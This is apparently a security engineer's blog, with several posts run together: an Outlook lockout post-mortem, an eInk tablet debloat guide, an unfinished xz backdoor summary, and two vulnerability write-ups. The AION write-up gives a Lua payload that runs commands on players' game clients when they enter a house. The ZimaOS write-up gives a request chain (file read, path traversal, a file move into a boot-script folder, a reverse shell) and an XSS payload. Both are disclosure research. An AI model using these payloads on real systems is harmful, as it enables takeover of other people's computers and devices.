A few weeks ago, I lost access to my email account. That experience opened my eyes to just how much I depended on it and how expensive a “free” service can become when things go wrong.

This is a post-mortem of what happened and what I learned.

17 The MFA trap: losing access to everything

Few weeks ago changed my Outlook password using my password manager on mobile. If you have ever tried this, you know that sometimes the password gets changed but does not get saved in the manager, especially if you forget to press save. I figured it was not a big deal and that I could reset it later if needed.

Then my phone broke. I was not too worried, since I had backups and assumed I could recover everything.

I restored my backup, reinstalled Microsoft Authenticator, and tried to log in.

But to approve the request on the Authenticator I needed to log in to my Microsoft account, which required the password I had just changed (and not saved).

I then tried to use the password reset option and got prompted to verify my identity using other otpions: the Authenticator (which I could not access without the password), a code to my recovery email, or an SMS.

I chose the email option, received the code, and entered it. But Microsoft was not satisfied with just that.

I got prompted with a second code, this time giving me the choice between the Authenticator (still inaccessible) or SMS.

I requested the SMS code. At this point, the system displayed: “Try another verification method” Nothing else.

Trying again I will get the same error and a third time resulted in “Your account has been locked for 24 hours”.

I was left completely locked out, unable to authenticate, reset my password, or even understand why my recovery options were blocked.

Here is a brief sequence diagram to resume the situation:

sequenceDiagram
    participant Me  
    participant Microsoft Account
    participant Recovery Email
    participant Authenticator App
    participant SMS

    Me->>Me: Resets phone
    Me->>Microsoft Account: Attempts to log in (password unknown)
    Microsoft Account->>Me: Prompt for password
    Me->>Microsoft Account: Tries to reset password
    Microsoft Account->>Me: Choose verification method (Authenticator, Recovery Email, SMS)
    Me->>Microsoft Account: Selects Email
    Microsoft Account->>Recovery Email: Send verification code
    Recovery Email->>Me: Receives code
    Me->>Microsoft Account: Enters email code
    Microsoft Account->>Me: Prompt for second factor (Authenticator or SMS)
    Me->>Microsoft Account: Request SMS
    Microsoft Account->> Me: Prompt for phone number
    Me->>Microsoft Account: Enters correct phone number
    Microsoft Account->> Me: This method is not available, try again later
    loop Repeated attempts
        Me->>Microsoft Account: Retries process
        Microsoft Account->>Me: Second factor still required, SMS fails to be sent
    end
    Microsoft Account->>Me: Account locked for 24h

18 The sound of silence

I suspect the lockout was triggered by Outlook’s Zero Trust policy. Because I changed my password just a few hours before, and then tried to log in from a new device, the system likely flagged this as suspicious activity.

As a result, it silently disabled the SMS recovery method without any warning or explanation. The only feedback I got was the generic “This method is not available” message. Which prompted me to just retry, flagging me even more as suspicious attempt and locking my account even more.

19 No way in

Reaching out to support felt like entering a bureaucratic maze. I got send to fill out a recovery form: twenty questions about my account, supposedly checked by a bot. If you get enough right, you get your account back. If not, it is gone forever.

The questions ranged from “What was your Skype name?” to “List ten subjects and exact recipients of emails you sent in the last year.”

I tried to recall as many details as possible, even calling friends and colleagues to piece together the information.

Seconds after submitting the form, I received an automated rejection from Microsoft.

I could not recover my account because I had 2FA, but I could not use 2FA because I was locked out. Every support chat in the following days ended with either “Fill out the form again,” “Wait 72 hours and try to login again,” or “You should just create a new account.”

After five rounds of filling out forms and chatting with Outlook support, and begging what I think was a poorly trained LLM to escalte my case, I finally got a call from microsoft. There was just a small issue: It came at 2 AM, my local time.

Of course, I was asleep and missed it.

20 Single Point of Failure: the OAuth Domino effect

Losing access to my Microsoft account was not just about missing email but it broke everything that relied on OAuth2/OIDC.

I could not log in to services like Tailscale, which only allow sign ups through OIDC providers and as of 03/2026 only allows passkey accounts if you get invited to a TailNet by an account that signed up via OIDC . Basically my digital identity had become a single point of failure, locking me out of tools and workspaces.

The consequences went beyond tech. In Italy, you can declare a certified email address tied to your electronic Identity Card, which is required to access public administration services.

Guess which email I had registered as my certified address? Exactly. The one I was now locked out of.

The domino effect was real, and it made me realize just how much this is gonna affect me.

21 Any alternative?

Every now and then someone is recommending to “just self-host your mailserver” to escape the tech giants. Yeah, been there, done that. Anyone who’s actually tried it (and stuck with it) will tell you tahat running your own mail server is nightmerish, not because of the tech stack but mainly because it’s hard keeping your server’s reputation clean without getting blacklisted by the world and honestly I don’t have the time, nor mana for that.

21.1 Proton Mail

After a lot of thinking (and a lot of 72-hour lockouts, thanks Outlook support), I realized the real problem wasn’t Zero Trust policies locking me out which is fair. It was support, run by what felt like a lobotomized LLM failing to understand basic tasks.

So, following the old “you get what you pay for” mantra, I decided to try paid providers.

It’s a gamble, of course. Support is like security: you don’t realize how much you need it until you really need it. I just hope my money is going into the right bucket.

Since I was already using Proton VPN and had a good experience, I upgraded to the unlimited plan that also offers 24/7 support, just in case.

This time, I’m trying a new approach to email management, since Proton Mail has some genuinely useful features.

21.1.1 Hide-My-Email Aliases

Proton bought SimpleLogin, a service for creating email aliases. If you’ve got a Proton Pass premium plan (yeah, Proton Pass, not Proton Mail… don’t ask me why), you can spin up aliases using “premium domains”, aka these addresses look less like throwaways, so more services will actually accept them.

This is perfect for signing up to sketchy or oneshot services you don’t fully trust. If they start spamming you, just nuke the alias and you’re done with them for good.

21.1.2 Sieve Filters

Another interesting feature of Proton Mail is Sieve filters basically you can write scripts to handle incoming mails and do actions based on various conditions. The system is very powerful but limited by the fact that, since email body is encrypted e2e the filters can’t access it.

A small tip I can give is: there are a lot of sieve filters collections on GitHub, some of them are faulty tho, because they all use something like that to include a domain and all the subdomains:

if address :matches :domain "from" ["*example.com", ..] {
    doStuff()
}

probably because someone wrote it and the rest of the people copy-pasted but that’s a very dangerous filter that will actually allow for phishing emails like notreallyexample.com to be flagged as correct

In case you want instead include all domains and subdomains the safe way is:

if address :domain :matches "from" ["example.com", "*.example.com"] {
    doStuff()
}

22 TOTP seeds

It makes sense that Microsoft’s Authenticator app requires you to log in, since your TOTP seeds are stored in the cloud and tied to your account. The real problem is that, even after you regain access, there is no way to recover or export your TOTP seeds. Your second factors are effectively trapped inside their ecosystem, with no way to back them up or move them elsewhere.

You can check out Aegis or Ente Auth. Both support e2e cloud backups and, most importantly, let you export your TOTP seeds whenever you want.

23 Prepare your readiness kit

Having MFA enabled is always a good thing, the issue occurs when you lost access to the additional factors, for one reason or another. If you happen to have a password manager you probably heard about a readiness kit, it’s literally a file that contains informations about what to do to recover your access to your lost account. That’s good and you should have one, but you should also pick providers that allow you to remove your factors using recovery codes. So pick them wisely.

Here are some templates for recovery kits in case you are interested:

• Bitwarden
• 1password

Regarding this theme, Proton has a feature regarding Emergency Access

24 Key takeaways

Losing access to my email was a wakeup call. Here’s what I wish I’d done sooner and what you should do before it’s too late:

• Don’t trust a single provider with your digital life. Always have backups and recovery options outside their ecosystem.
• Use an authenticator app that lets you export your TOTP secrets.
• Print out recovery codes and stash them somewhere safe. Old-school, but it works when everything else fails.
• Pay for support on accounts that matter. It’s not a guarantee, but it’s better than shouting into the void.
• Write down your own recovery plan. Make sure someone you trust knows where to find it.

When I was younger, MMOs were everywhere. World of Warcraft had already taken over the world with millions of players, Lineage II and Runescape had their own massive communities, and when AION launched in 2009 by NCSoft (a South Korean Company) it quickly became one of the most populated MMOs, with around 6 million players in Asia and 1 million in Europe.

But honestly teenager me never really got into it. My thing was mainly FPS. I’d rather be playing Halo 3 or Call of Duty matches than grinding dungeons and raids.

Few weeks ago though, some of my friends decided to give AION another go, this time on a private server. For anyone unfamiliar, private servers are unofficial versions of the game run by the community. They invited me to join them, and that’s how I finally ended up in AION.

Except, instead of just playing, I got curious about how things worked behind the scenes, which eventually led me to uncover a vulnerability hidden in the original client itself.

1 The housing system

In version 3.0 (2011), NCSoft introduced the Housing system to AION. Each player could purchase a house and customize it with furniture and decorations.

One particularly interesting part of the system was this NPC:

This is the Butler. Through the Butler, players could manage their house and, more importantly, access the housing scripting system. With it, players were able to write simple scripts to play sounds or automate actions that would happen inside their house.

The problem? Documentation for this in-game editor was almost non-existent.

I had to experiment and work around its limitations, using trial and error. Fortunately, the game included a few pre-populated scripts, which gave me a starting point to understand how the system worked.

2 stdout or stdbutler?

Looking at the script source, it was clear that the system was based on some version of Lua. However, it ran inside a sandbox, and many basic functions were unavailable.

One of the pre-loaded example scripts I found was designed to greet each player who entered the NPC’s range. Here’s a simplified version (some parts have been removed for readability):

...
function GetHelloString(desc)
    if (helloTable[desc] == nil) then
        return desc.."[kvalue:Default greeting;, Hello, dear.;str]";
    end
        return helloTable[desc][1];
end

function GetHelloSound(desc)
    ...
end

-- Called on function initialization.
function OnInit()

    -- With the SetSensor command, you can customize the distance the butler recognizes a user.
    -- The butler recognizes the user inside the radius of the first variable.
    -- The butler does not respond if the user is outside the second variable.
    -- For the following code, the butler recognizes a user when he/she comes within a 3m radius.
    -- Again, the butler does not respond when a user passes a 30m radius.
    H.SetSensor(3, 30);

end

-- Calls when a user enters a distance range that the butler can recognize.
function OnUserEntered(desc)

    -- With the PlaySound command, options can be set to play music or a label.
    -- The first variable is to set channels and the second one sets music score.
    -- This line sets 2 labels for channel no. 0.
    H.PlaySound(0, "r[1]r[2]");

    -- Play the effect sound for the respective visitors.
    if (GetHelloSound(desc) ~= nil) then
        -- The SetPercussion command is used for customizing sounds.
        H.SetPercussion(1, GetHelloSound(desc));
        -- "x" refers to SetPercussion, enabling the preset sound.
        H.PlaySound(1, "x");
    end

    -- The butler speaks through a speech bubble.
    -- The first variable "2" refers to the label no. [2] in the PlaySound command.
    -- Enter the dialog message of the butler in the second variable.
    H.Say(2, GetHelloString(desc));
end

The environment turned out to be a sort of Lua sandbox with many functions stripped out. That’s pretty common in games that allow customization like mods or plugins.

For those not familiar, Lua is an interpreted language known for being lightweight and highly extensible. Global variables, functions, etc., live in a global table called _G.

My idea was to loop through _G and see what I actually had access to, since again, there’s zero documentation on this system.

At first I tried getting some output using print() or writing to stderr, but both were disabled. Even though the scripting editor had an output box, I couldn’t figure out how to write to it directly.

The only thing that worked was calling error(), which does print to the box, but it also returns immediately, which makes things messy.

While looking through one of the sample scripts bundled with the Butler, I noticed a function called H.Say() that makes the NPC speak in chat.

That seemed like the perfect way to get output without stopping the execution, so I decided to use it for my enumeration.

Here’s the first script I wrote to dump accessible tables:

...

-- If user select a voice in the menu
function OnMenu(menuNum)
--- If the voice is not 3 (our command) go out
  if (menuNum ~= 3) then
    return;
  end
   -- Calling H.PlaySound() is somehow necessary before calling H.Say(), otherwise the NPC won't speak
   -- No idea why, I just figured it out with trial and error and reading the pre-existing scripts
   H.PlaySound(0, "r[1]");
   local env = _G
   H.Say(1,"=== DUMPING ".. "_G ===");
   local result = ""
        -- Iterate the table
        for k, v in pairs(env) do
          result = result .. tostring(k) .. " = " .. tostring(v) .. "\n"
          -- Use butler as stdout
          H.Say(1,tostring(k).." = " .. tostring(v));
        end
        
end

And to my great surprise it worked:

3 Reaching code execution

Apparently the sandbox is very loosely configured and we have access to a lot of functions that allow code execution. Among those we have: loadstring(), loadfile(), load().

A partial list is available in this image:

There is a very interesting article about memory corruptions in Lua applied in particular to games, which explains why functions like load(), loadfile() and loadstring() are very dangerous.

They allow execution of raw bytecode, which isn’t inherently unsafe, but in Lua versions ≤ 5.1 there are numerous bypasses for memory safety issues and in Lua 5.2 the bytecode verifier was completely removed (source, bypass).

This means we can leak addresses using print(), or, in our case H.Say(), write and load bytecode, and trigger memory corruption entirely through built-in functions.

To do this though, I would normally need a decent interface to read leaked addresses, edit bytecode, or attach a debugger. However, this client includes an anti-cheat system called Active Anticheat which prevents external processes from attaching to the client.

That rules out using gdb to debug my (very rough) payloads, and although stdbutler is useful, it would be a pain to debug everything with it, especially with ASLR in play.

Fortunately we don’t need any of this since the developers forgot to disable the io package which gives access to io.popen() allowing us to spawn processes directly.

The final script is really simple but effective:

...
function OnMenu(menuNum)
--- If the voice is not 3 (our command) go out
  if (menuNum ~= 3) then
    return;
  end
    io.popen("calc.exe");
end

And just like that we got our calc:

4 Removing interaction

A private server for an MMO usually isn’t official, and there are typically two ways it comes about. Either someone leaks the official sources (or binaries), or someone reverse-engineers the client to figure out how the backend works and builds an emulator themselves, often with a client patch to point to the new backend.

In this case, it’s the second scenario, which gives me fairly high confidence that this exploit would also work on the official client.

Looking at the source of one private server implementation it’s clear that every time a player enters a house, all the scripts contained in that house are sent directly to their client:

public void sendToPlayer(Player player, int houseAddress) {
		if (player == null)
			return;
		SplitList<PlayerScript> scriptSplitList = new DynamicServerPacketBodySplitList<>(Arrays.asList(scripts), false, SM_HOUSE_SCRIPTS.STATIC_BODY_SIZE,
			SM_HOUSE_SCRIPTS.DYNAMIC_BODY_PART_SIZE_CALCULATOR);
		scriptSplitList.forEach(part -> PacketSendUtility.sendPacket(player, new SM_HOUSE_SCRIPTS(houseAddress, part)));
	}

}

This means that it is possible to achieve code execution on the client of every player who interacts with the Butler. This is cool but how can we trigger it without requiring the interaction?

Looking at the pre-populated scripts there are some functions available:

• OnMenu(), which runs when a menu option is selected
• OnUserMessage, which triggers whenever someone sends a chat message
• OnInit(), which runs automatically whenever the script is loaded (which is when a player enters a House).

We can leverage OnInit() to execute our payload automatically each time the script is initialized, removing the need for any interaction.

5 Conclusions

As expected, a feature implemented more than a decade ago turned out to be vulnerable to code execution in a surprisingly simple way.

The official AION MMO is still running in two versions: “Classic”, which doesn’t have the housing system at all, and “Retail” which still maintains the housing system but according to someone who read this blogpost and tested it, the same payload doesn’t work.

In the private server scene, however, the situation is different: most active servers run versions from 3.0 to 4.8, which are still susceptible to this vulnerability.

I’ve always found game exploits fascinating, as they often require deep knowledge of binary exploitation and creative ways to bypass anti-cheat mechanisms.

In the future, I’d like to experiment loading bytecode directly to trigger memory corruptions through the in-house scripting system, though doing so would require bypassing the anti-cheat protections. I would also try to do a bit of research on the latest version of the retail game.

I recently received my ZimaCube: a NAS from IceWhale, the same company behind the ZimaBlade, ZimaBoard and most notably CasaOS, a UI to manage docker applications.

The ZimaCube ships with the default OS called ZimaOS.

Upon booting it up connected to an external monitor I was welcomed with the following TTY message:

Cool, I need to press alt+F2, there is just one small, insignificant problem…

1 The problem

All my keyboards are <= 60% so the F row is activated by the Fn special key, the problem is that for some reasons I’m not aware of connecting it to the NAS will not work so no luck.

Let’s analyze the possible alternatives:

• Let’s exclude B because is something that no one will do, right? RIGHT?

• A seems the easiest one but it will not get delivered until Monday and it’s way too hot outside these days. And I also don’t want to change a working keyboard.

• D is kinda reasonable too, but the OS is on an M2 Drive and I have no adapters.

I don’t see any other choice of getting my hands dirty and find some good, old unintended solutions.

2 Overcomplicating the issue for fun (and boredom)

In the same screen where I’m asked to press alt+F2 there is a reference to the ZimaOS WebUI so I decided to start investigating it.

After loading the homepage I saw something similar to CasaOS interface, but in some way different (as I said, they ship a custom version).

While ZimaOS was in beta I found a code injection in the Storage Management API that is still unpatched but unfortunately I need an additional mounted drive to exploit it.

CasaOS is opensource but any component in ZimaOS isn’t, so I have no idea on the exact differences between the two interfaces.

The code injection exists because they are concatenating arbitrary user input into a cmd.Exec function:

func ExecLSBLKByPath(path string) []byte {
    // the path parameter is sent by the user
	output, err := exec.Command("lsblk", path, "-O", "-J", "-b").Output() 
	...
}

Before merging the disk (and so calling lsblk), the existence for the mountpoint is checked:

func excludeVolumesWithWrongMountPointAndUUID(volumes []*model2.Volume) []*model2.Volume {
	return filterVolumes(volumes, func(v *model2.Volume) bool {
        // This function checks if the mountpoint exists
        // If it returns err the vulnerable call is not reached
		path, err := partition.GetDevicePath(v.UUID)
		if err != nil {
			logger.Error("failed to corresponding device path by volume UUID", zap.Error(err), zap.String("uuid", v.UUID))
			return false
		}
    // Call the vulerable function
    par := command.ExecLSBLKByPath(path)
    ...

Unfortunately I have no empty disks at the moment so I have to find another bug.

2.1 Arbitrary file read

This UI has 3 main features:

• The App Store that basically let you download apps that run in Docker via docker-compose files (more on this later).

• The Files app that allows you to navigate the filesystem (only partially)

• The ZVM app that is a wrapper on libvirt and allows virtualization.

I started with the Files app since having a built-in function to read/write would be a nice advantage.

We are forced to read and write the content of /DATA and /Media but looking at the file download function there is a pretty straightforward parameter that will allow to read arbitray files.

Sending a GET request to /v3/file with the paramether files to any path outside the webroot will do the trick.

2.2 Looking at CasaOS source code

The API for the Files app is under /v3/file, but sometimes also /v2_1/files/file, we have no source for it but answers and the requests parameters looks very similar to CasaOS files app so i supposeed that finding any vulnerability in that app may also work on ZimaOS WebUI.

Looks like there was a code injection in the MountSmaba (yes, there is a typo) function since host is appended directly to the command string and the only validation mechanism checks the number of : in the string but (un)fortunately was patched last year with this pull request.

2.2.1 Bonus #1: Executing arbitrary commands during the update process

IceWhale decided to handle system update with this function:

func (s *systemService) UpdateSystemVersion(version string) {
	keyName := "casa_version"
	Cache.Delete(keyName)
	if file.Exists(config.AppInfo.LogPath + "/upgrade.log") {
		os.Remove(config.AppInfo.LogPath + "/upgrade.log")
	}
	file.CreateFile(config.AppInfo.LogPath + "/upgrade.log")

    if len(config.ServerInfo.UpdateUrl) > 0 {
		go command2.OnlyExec("curl -fsSL " + config.ServerInfo.UpdateUrl + " | bash")
	} else {
		osRelease, _ := file.ReadOSRelease()
		go command2.OnlyExec("curl -fsSL https://get.casaos.io/update?t=" + osRelease["MANUFACTURER"] + " | bash")
	}

}

the TL;DR is: a script get downloaded from https://get.casaos.io/update and piped to bash.

It’s honestly a questionable design but I’m not here to judge (not today atleast), but since they already got native code runnig the update script could be a native function instead. And will for sure cut out issues like the domain being unreachable or, even worse, the update script compromised.

During the update process, there are two paths that could be used during a race condition to turn an arbitrary file write into a code execution since every script in this directory get executed:

One is: /tmp/casaos-installer/${randomstring}/build/scripts/migration/script.d:

DownloadAndInstallCasaOS() {

    if [ -z "${BUILD_DIR}" ]; then
        ...
        # TMP_ROOT is TMP_ROOT=/tmp/casaos-installer
        TMP_DIR=$(${sudo_cmd} mktemp -d -p ${TMP_ROOT} || Show 1 "Failed to create temporary directory")
        ...
        BUILD_DIR=$(realpath -e "${TMP_DIR}"/build || Show 1 "Failed to find build directory")
        ...
    fi

    
    MIGRATION_SCRIPT_DIR=$(realpath -e "${BUILD_DIR}"/scripts/migration/script.d || Show 1 "Failed to find migration script directory")

    # MIGRATION_SCRIPT_DIR is /tmp/casaos-installer/${randomstring}/build/scripts/migration/script.d
    for MIGRATION_SCRIPT in "${MIGRATION_SCRIPT_DIR}"/*.sh; do
        ...
        # execute every script in that directory as root
        ${sudo_cmd} bash "${MIGRATION_SCRIPT}" || Show 1 "Failed to run migration script"
    done
 ...
}

and the other is /tmp/casaos-installer/${randomstring}/build/scripts/setup/script.d, few lines later in the same function:

  SETUP_SCRIPT_DIR=$(realpath -e "${BUILD_DIR}"/scripts/setup/script.d || Show 1 "Failed to find setup script directory")
  for SETUP_SCRIPT in "${SETUP_SCRIPT_DIR}"/*.sh; do
    # again, executing everything in that directory
    ${sudo_cmd} bash "${SETUP_SCRIPT}" || Show 1 "Failed to run setup script"
  done

2.2.2 Directory listing

Using mktemp would be a good enough method to prevent path guessing, if only there wasn’t a directory listing in /v2_1/files/file.

Indeed, sending a GET request to /v2_1/files/file with the parameter path pointing to an arbitrary path will result in a directory listing, even if we shouldn’t be able to interact with anthing outside /Data and /Media.

This way we can detect if any directory has been created in /tmp/casaos-installer/ and find the name of the temporary directory.

2.2.3 Path traversal in upload

We have an arbitrary file read, a directory listing and two entrypoints (even if we need to perform a system update), we just need an arbitrary file write to complete the chain.

Luckily (only for us tho), the same endpoint we used to read arbitrary files has an upload function with a path traversal vulnerability

func (s *FileUploadService) UploadFile(
  ...
) error {
	...

    // path and relativePath are sent by the user
	file, err := os.OpenFile(path+"/"+relativePath+".tmp", os.O_WRONLY|os.O_CREATE, 0644)
	...
    src, err := bin.Open()
	if err != nil {
		return err
	}
	defer src.Close()

	_, err = io.Copy(file, src)

	...
}

2.2.4 A valid entrypoint

Digging deeper I found another interesting entrypoint to turn arbitrary file write into code execution: This time the only requirement is a reboot (the webUI allows to reboot from web interface).

In brief, every file placed in /etc/casaos/start.d will be executed at boot:

func ExecuteScripts(scriptDirectory string) {
    ...
    // scriptDirectory is /etc/casaos/start.d
	files, err := os.ReadDir(scriptDirectory)
    ..
    // for each file in /etc/casaos/start.d
	for _, file := range files {
        ...
		scriptFilepath := filepath.Join(scriptDirectory, file.Name())

        ...
        // execute the script
		cmd := exec.Command(interpreter, scriptFilepath)
        ...
}

2.2.5 Abusing the move and copy funtionality

Let’s pretend for a second we don’t have any of the previous arbitrary read/write vulnerabilities, what else can we use?

Another intereting functionality CasaOS has is the ability to move and copy files (supposedly inside the allowed directory).

Since there is no mechanism in place to check what and where is being moved/copied, we can abuse this functionality to get read/write in the whole filesystem.

if temp.Type == "move" {
			lastPath := v.From[strings.LastIndex(v.From, "/")+1:]
			if !file.CheckNotExist(temp.To + "/" + lastPath) {
				if temp.Style == "skip" {
					temp.Item[i].Finished = true
					continue
				} else {
					os.RemoveAll(temp.To + "/" + lastPath)
				}
			}
			err := file.CopyDir(v.From, temp.To, temp.Style)
			if err == nil {
				err = os.RemoveAll(v.From)
				if err != nil {
					logger.Error("file move error", zap.Any("err", err))
					err = file.MoveFile(v.From, temp.To+"/"+lastPath)
					if err != nil {
						logger.Error("MoveFile error", zap.Any("err", err))
						continue
					}

				}
			}

Indeed, sending a POST request to /v2_1/files/task with the following body:

{
  "to":"/etc/casaos/start.d",
  "type":"move",
  "item":[
	{
		"from": "/media/ZimaOS-HD/Downloads/payload"
	 }
  ]
}

allows us to move files around in places we are not supposed to, easy as that.

A standard WebUI user could just move files in the /Media directory, that is allowed to read, or upload files to /Media and then move them around arbitrarily. This functionality can be effectively abused to get full code execution on the machine since we eariler found that everything in /etc/casaos/start.d grants execution at boot.

2.3 Finalizing the exploit

I finally have enough to resolve the issue.

I wrote few lines of code to do the following:

• Write a file containing a reverse shell to /media/ZimaOS-HD/Downloads/ (intended functionality)
• Move the file to /etc/casaos/start.d
• Use the directory listing to check if the file has been succesfully moved
• Reboot the machine

The PoC is available at https://github.com/himazawa/zimaos-postauth-rce

2.4 Bonus #2: DOM based XSS

I have no interest in making the chain remote, but there is a DOM based xss at /v2/app_management/web/sync/appstore in the url parameter and the payload is :<img src=x onerror=alert(1) >. Note the : because they are needed in order to make this function fail

3 Conclusion

In the end it was a fun Saturday that demostrated that good old web vulnerabilities are still a thing :P CasaOS and ZimaOS are being reworked right now to fix the issues and the advisories will be published soon.

4 Timeline

• 24/06/2024 - Vulnerability Reported
• 03/08/2024 - A fix for the code injection was released
• 07/08/2024 - Asked IceWhale permission to release this post

I was looking for an eink tablet to r ead books and take notes while I’m away from home.

After adventuring in the eInk rabbit hole I decided to go for the Onyx Boox Go 10.3: a Black and White eInk Android Tablet with 300ppi that’s also good for taking notes, weighting only 365g!

I was a bit concerned about this report from Mozilla so I decided to take a look at the device.

17 Enabling ADB

The Onyx default Launcher is hiding a lot of the Android inner features but reading a bit of documentation I figured out how to enable ADB.

TL;DR: Press the Apps Icon on the left -> Top right icon -> App Management -> Enable “USB Debug Mode”.

Connecting the device via usb and running adb shell will open a shell on the device.

18 Removing unnecessary apps

Navigating the UI I figured out the tablet is full of useless (for me) apps, so I decided to remove them. After installing adb I removed the unwanted apps with the following commands:

pm uninstall com.android.bips
pm uninstall com.android.bluetoothmidiservice
pm uninstall com.android.cameraextensions
pm uninstall com.android.cts.ctsshim
pm uninstall com.android.dreams.phototable
pm uninstall com.android.emergency
pm uninstall com.android.internal.display.cutout.emulation.corner
pm uninstall com.android.internal.display.cutout.emulation.double
pm uninstall com.android.internal.display.cutout.emulation.hole
pm uninstall com.android.internal.display.cutout.emulation.tall
pm uninstall com.android.internal.display.cutout.emulation.waterfall
pm uninstall com.android.internal.systemui.navbar.gestural
pm uninstall com.android.internal.systemui.navbar.gestural_extra_wide_back
pm uninstall com.android.internal.systemui.navbar.gestural_narrow_back
pm uninstall com.android.internal.systemui.navbar.gestural_wide_back
pm uninstall com.android.internal.systemui.navbar.threebutton
pm uninstall com.android.printservice.recommendation
pm uninstall com.android.providers.blockednumber
pm uninstall com.android.providers.contacts
pm uninstall com.android.quicksearchbox
pm uninstall com.android.smspush
pm uninstall com.android.theme.font.notoserifsource
pm uninstall com.android.vending
pm uninstall com.google.android.apps.restore
pm uninstall com.google.android.gms.location.history
pm uninstall com.google.android.overlay.gmsconfig.common
pm uninstall com.google.android.syncadapters.calendar
pm uninstall com.google.android.syncadapters.contacts
pm uninstall com.onyx.aiassistant #AI Assistant app
pm uninstall com.onyx.android.production.test #Test feature
pm uninstall com.onyx.appmarket # Appmarket app
pm uninstall com.onyx.calculator # Calculator app
pm uninstall com.onyx.clock # Clock app
pm uninstall com.onyx.dict # Dict app
pm uninstall com.onyx.easytransfer # Easytransfer app
pm uninstall com.onyx.gallery # Gallery app
pm uninstall com.onyx.kime # Kime app
pm uninstall com.onyx.latinime # Keyboard app, removing it will leave you with the Google Speech-to-text keyboard 
pm uninstall com.onyx.mail # Mail app
pm uninstall com.onyx.musicplayer # Music player
pm uninstall com.onyx.voicerecorder # Voice Recorder
pm uninstall com.qualcomm.embms
pm uninstall com.qualcomm.qti.seccamservice
pm uninstall com.qualcomm.qti.server.qtiwifi
pm uninstall com.qualcomm.qti.services.systemhelper
pm uninstall com.qualcomm.qti.uim
pm uninstall com.qualcomm.qti.uimGbaApp
pm uninstall com.qualcomm.qti.xrcb
pm uninstall com.qualcomm.qti.xrvd.service
pm uninstall com.qualcomm.qtil.aptxui
pm uninstall org.chromium.chrome # Chrome browser

After installing Nova Launcher and selecting it as the default launcher I was able to also remove this three apps.

pm uninstall com.onyx.igetshop # iGetShop app
pm uninstall com.onyx.android.ksync # Ksync app,this app is doing a lot of calls to Onyx servers
pm uninstall com.onyx.kreader # Reader and Note taking app

18.1 For less tech-savvy people

If you don’t want to play around with the shell and manual adb commands, I added the Onyx apps to the Android Universal Debloater list.

Just run it and select the packages I listed in the previous sections.

19 Installing an alternative store

Since I removed the default Onyx Store, I decided to install Obtanium to get releases directly from the source.

Go here, download the APK and install it via adb with:

adb install app-release.apk

Why not F-Droid you ask? Because F-Droid doesn’t get updates directly from the source and sometimes are slow with releases alignment.

19.1 Minor changes to avoid phoning home

Onyx has a lot of calls to their domains, I just replaced them with different endpoints.

20 Changing NTP Server

Onyx uses its own NTP server, I replaced it with ntp.org

abd shell settings put global ntp_server pool.ntp.org
adb shell settings put global ntp_server_2 en.pool.ntp.org # replace "en" with your local time

21 Change captive portal endpoints

Onyx uses their endpoints for the captive portal pings so I switched them with the ones from Android:

adb shell settings put global captive_portal_http_url "http://connectivitycheck.android.com/generate_204"
adb shell settings put global captive_portal_https_url "https://connectivitycheck.android.com/generate_204"
adb shell settings put global captive_portal_fallback_url "http://connectivitycheck.gstatic.com/generate_204"

22 Bonus: Blocking onyx domains

Just in case I added the following domains to my blocklist:

send2boox.com # used by KSync
push.boox.com # used by KSync
en-rom.boox.com
onyx-international.cn #Used for NTP Server

23 Conclusion

In the end the Onyx Boox Go 10.3 is a very nice device (hardware-wise) that suits my needs. If you want to buy it consider everything written in this post and make an informed purchease.

P.S. also consider that the device is new at the time of writing and the default cover is terrible.

24 Useful Resources

• Manifacturer website
• Mobile Read thread on Onyx Boox Debloat
• Reddit Onyx Boox Community
• Reddit eink Community

As you probably already heard, the xz package got compromised.

The package was used as entrypoint to inject malicious code in sshd, altering the authentication flow. This forged vulnerability is now known as CVE-2024-3094.

Looks like the injected code takes the payload from a specific key and execute it.

This is probably a full fledged operation due to its methodology and duration but I’m not the right guy to talk about OpSec and Threat Actors attributions. Check the Resources section for additional links.

The situation doesn’t look too good so I’m trying to write this blogpost as a summary.

I don’t want to address the technical aspect of the compromission but I want to look at the issue from the perspective of a Security Engineer, summarizing what went wrong and trying to find a remediation.

1 Timeline

• 2023:

  • A new maintainer shows up in the xz project

• 29 Mar 2024:

  • Andres Freund sent an email to the oss-security mailing list regarding a backdoor in xz/liblzma. He was optimizing his infrastructure and found that ssh was suspiciously slow. Some debug later he found the issue was likely caused by the backdoor. The initial analysis was performed with the help of Florian Weimer.

  • Impacted distros are starting to ship patches to downgrade the xz version (more on that later)

• 30 Mar 2024:

  • GitHub blocked access to the repostiory and blocked the account of both the xz maintainers, an updated code is available here

  • An official statement was released by the project maintainer

• 31 Mar 2024:

  • potential killswitch identified, take that as a grain of salt

2 Impacted components

The extent of this breach is still unkown, but here is a (partial) list of components shipping the known malicious version of xz:

Distributions:

• Arch
• Debian Sid
• Gentoo
• Fedora 40
• Manjaro Testing
• Parabola
• NixOS Unstable
• Slackware
• SUSE Tumbleweed
• Kali Linux

The backdoored package is also contained in the repositories of the following package managers:

• Homebrew
• MacPorts
• pkgsrc

At the moment we know that there are checks in the backdoor to target Linux instances and only x86_64/amd64 builds so the real number could be downsized, but since the entire situation is unclear I would not reccommend to keep a compromised package on your system.

3 Considerations

3.1 The GitHub Behavior

The reasons behind the xz repositories lockdown are still a mistery to me, especially knowing that with the source code available additional anaysis on the backdoor could be performed.

Blocking access to the source code is something that will delay further results, that is honestly really bad for time-critical situation like this one. An updated mirror is available here

3.2 The downgrades

The patch strategy for basically everyone was to force a downgrade from the 5.6.0-5.6.1 to another version.
Some (homebrew, for example), forced the downgrade to 5.4.6.

This looks interesting because for sure we know there is a backdoor on that (5.6.0-5.6.1) versions, but we also know that the attacker has been working on the repository for over two years.

The 5.4.6 version is also builded by the attacker and honestly wouldn’t trust it much.

4 How to prevent this issue?

As I said at the beginning of the post, I don’t want to go too deep into the technical analysis of the backdoor, for two main reasons: with the sourcecode locked and only an archive available the informations are incomplete and I really don’t want to reverse the xz binary. Also, and this is the more important reasons, people more knowledgeable than me on Threat Actors behaviors are already on it. I will just link their posts once are ready, so make sure to check the Resources section below.

One thing I can do here is showing the point of view of a Security Engineer on the issue, how I would mitigate the problem and what steps went wrong.

4.1 Trust issues

xz is a software mainteined (up until 2023) by 1 single guy. Later another maintainer joined but unfortunately for us, it was the same guy pushing the backdoor to upstream. This crashes against the fact that xz is an incredibly popular package available in a lot of distributions and being a dependency of many softwares.

This was likely seen by the attacker as a gold mine since it was easy to get the role of maintainer of the project and push the malicious code.

